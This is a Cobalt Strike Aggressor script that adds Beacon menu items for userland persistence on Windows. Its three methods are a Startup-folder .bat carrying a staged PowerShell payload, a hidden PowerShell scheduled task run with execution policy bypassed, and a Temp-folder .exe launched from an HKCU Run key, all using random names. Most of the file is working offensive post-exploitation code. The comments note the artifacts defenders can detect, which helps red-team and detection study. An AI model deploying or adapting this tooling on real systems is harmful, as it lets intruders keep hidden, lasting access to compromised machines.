rto_persistence.cna
# Cobalt Strike Aggressor Script (Sleep syntax -- not Perl, despite the .cna
# metadata/classifier). This block registers a "Persistence > Userland"
# submenu on the Beacon right-click menu. In a beacon_bottom popup $1 is the
# list of selected beacon ids; each item forwards it unchanged to the handler
# defined further down in this file.
popup beacon_bottom
{
menu "Persistence"
{
menu "Userland"
{
# Drops a .bat into the user's Start Menu\Programs\Startup folder.
item "Startup Folder"
{
startup_folder($1);
}
# Drops a .ps1 into the user's %LOCALAPPDATA%\Temp and registers a task.
item "Scheduled Task"
{
scheduled_task($1);
}
# Drops an .exe into the user's %LOCALAPPDATA%\Temp and adds an HKCU Run value.
item "HKCU Autorun"
{
hkcu_persistence($1);
}
}
}
}
# Startup-folder persistence. $1 is the beacon id list from the popup. Note
# that $bid (and every other variable here) is a script-global, not local():
# the nested callbacks below read whichever value was assigned last.
sub startup_folder
{
$bid = $1;
# openPayloadHelper prompts the operator for a listener; inside this lambda
# $1 is the chosen listener name.
openPayloadHelper(lambda({
blog2($bid, "Tasked Beacon to install Startup Folder Persistence using " . listener_describe($1));
# Staged x64 PowerShell payload, compressed, then wrapped as a single
# powershell command line (second argument false = no import prefix).
$artifact = artifact_stager($1, "powershell", "x64");
$comp = powershell_compress($artifact);
$cmd = powershell_command($comp, false);
$filename = get_random_filename();
# binfo "user" is the beacon's user field; the prompt text below suggests it
# may carry a trailing "*" that the operator is expected to strip -- the
# prompt is the only hint of that, so treat it as an assumption.
$rawname = binfo($bid[0], "user");
prompt_text("Set Persistence username (remove *)", $rawname, {
$username = $1;
# Artifact left on disk: <8 random lowercase letters>.bat under the given
# user's Start Menu\Programs\Startup folder, i.e. it runs at that user's
# interactive logon. The .bat body is the powershell command line built
# above, so the observable chain is presumably cmd.exe -> powershell.exe
# launched from this folder; file creation here is the earliest signal.
bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ $+ $filename $+ .bat", $cmd);
blog2($bid, "Persistence payload uploaded to C:\\Users\\ $+ $username $+ \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ $+ $filename $+ .bat");
blog2($bid, "Startup Folder Persistence set for " . $username . "");
});
}));
}
# Scheduled-task persistence. $1 is the beacon id list from the popup; $bid is
# a script-global read by the dialog callback.
sub scheduled_task
{
$bid = $1;
# Dialog defaults: repeat every 4 hours for 30 days, username prefilled from
# the beacon's user field. In the callback $3 is the hash of dialog values.
$dialog = dialog("Scheduled Task Persistence", %(int => "4", dur => "30", user => binfo($bid[0], "user")), lambda({
$int = $3['int'];
$dur = $3['dur'];
$listener = $3['listener'];
$username = $3['user'];
blog2($bid, "Tasked Beacon to install Scheduled Task Persistence using " . listener_describe($listener));
$artifact = artifact_stager($listener, "powershell", "x64");
$comp = powershell_compress($artifact);
$filename = get_random_filename();
# Artifact left on disk: the compressed PowerShell payload as
# <random>.ps1 in the user's AppData\Local\Temp.
$path = "C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .ps1";
bupload_raw!($bid, $path, $comp);
$taskname = get_random_filename();
# Trigger: fires once one minute after registration, then repeats every
# $int hours for $dur days. $int, $dur and $username are operator input
# interpolated verbatim into the PowerShell text (no validation here).
$trg = "\$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Hours $+ $int $+ ) -RepetitionDuration (New-TimeSpan -Days $+ $dur $+ )";
# Action: powershell.exe with a hidden window, no profile, execution policy
# bypassed, running the dropped .ps1; working directory System32. A task
# whose action is powershell.exe -File pointing into a user Temp folder is
# the defender-visible artifact (task registration + the 4698/ScheduledTask
# operational log, and the powershell.exe command line on each run).
$act = "\$action = New-ScheduledTaskAction -Execute \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Argument \"-Sta -Nop -Window Hidden -Exec Bypass -File $+ $path $+ \" -WorkingDirectory \"C:\\Windows\\System32\"";
# Registered with a random 8-letter name and -Force (overwrites an existing
# task of the same name); no -TaskPath, so it lands in the default folder.
$reg = "Register-ScheduledTask -TaskName $+ $taskname $+ -Trigger \$trigger -Action \$action -Force";
bpowershell!($bid, " $+ $trg $+ ; $+ $act $+ ; $+ $reg $+ ");
blog2($bid, "Persistence payload uploaded to " . $path . "");
blog2($bid, "Scheduled Task Persistence set for " . $username . "");
}));
drow_text($dialog, "int", "Interval (Hours)");
drow_text($dialog, "dur", "Duration (Days)");
drow_text($dialog, "user", "Username (remove *)");
drow_listener($dialog, "listener", "Listener: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);
}
# HKCU Run-key persistence. $1 is the beacon id list from the popup; $bid is a
# script-global read by the nested callbacks.
sub hkcu_persistence
{
$bid = $1;
# Inside this lambda $1 is the listener chosen in openPayloadHelper.
openPayloadHelper(lambda({
blog2($bid, "Tasked Beacon to install HKCU Persistence using " . listener_describe($1));
# Staged x64 executable (not PowerShell this time).
$artifact = artifact_stager($1, "exe", "x64");
$filename = get_random_filename();
$regname = get_random_filename();
# Beacon user field, prefilled into the prompt; see the "remove *" hint.
$rawname = binfo($bid[0], "user");
prompt_text("Set Persistence username (remove *)", $rawname, {
$username = $1;
# Artifact left on disk: <random>.exe in the user's AppData\Local\Temp.
bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe", $artifact);
# Artifact left in the registry: a REG_EXPAND_SZ value with a random
# 8-letter name under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# whose data is the full path to that .exe; -Force overwrites an existing
# value of the same name. The value name is not predictable, but an
# autostart entry resolving into a Temp directory is the signal to key on.
bpowershell!($bid, "New-ItemProperty -Path HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name \" $+ $regname $+ \" -PropertyType ExpandString -Value \"C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe\" -Force");
blog2($bid, "Persistence payload uploaded to C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe");
blog2($bid, "HKCU Run Key Persistence set for ". $username ."");
});
}));
}
# Returns an 8-character string of random lowercase ASCII letters. Used for
# every dropped-file name, the task name and the Run value name above, so
# detections should anchor on location and parent rather than on the name.
# @chars and @result are script-globals here, as in the rest of the file.
sub get_random_filename
{
@chars = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
@result = @();
# rand(@array) yields a random element; collect eight of them.
while (size(@result) < 8)
{
push(@result, rand(@chars));
}
return join("", @result);
}